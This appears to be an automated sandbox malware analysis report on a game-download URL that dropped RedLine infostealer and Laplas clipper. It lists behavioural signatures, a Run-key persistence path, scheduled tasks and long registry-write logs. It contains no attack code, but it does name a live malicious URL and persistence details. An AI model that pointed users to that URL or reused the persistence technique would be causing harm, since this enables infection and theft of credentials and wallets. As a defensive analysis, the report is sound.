Malware Analysis Report

2024-10-19 01:10

Sample ID 230801-z2p79abd25
Target https://feel-easy.games/catalog/counter-strike-go/
Tags
laplas redline @millioner_lzt clipper infostealer persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://feel-easy.games/catalog/counter-strike-go/ was found to be: Known bad.

Malicious Activity Summary

laplas redline @millioner_lzt clipper infostealer persistence spyware stealer

Laplas Clipper

RedLine

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

GoLang User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Views/modifies file attributes

NTFS ADS

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-01 21:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-01 21:13

Reported

2023-08-01 21:16

Platform

win10-20230703-en

Max time kernel

193s

Max time network

196s

Command Line

"C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/"

Signatures

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2219095117.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "407" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile - English (United States)" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\media.net\NumberOfSubdomains = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "51" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "641" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "804" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "409" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "DebugPlugin" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{06405088-BC01-4E08-B392-5303E75090C8}" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e2872416bdc4d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1310" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Program Files\7-Zip\7zG.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "1310" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pubmatic.com\Total = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Near" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2013.1022" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cec7481dbdc4d901 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SW" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "769" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ads.pubmatic.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6;18;22" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6e-1" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "289" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Adult" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "397705972" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "971" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1343" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
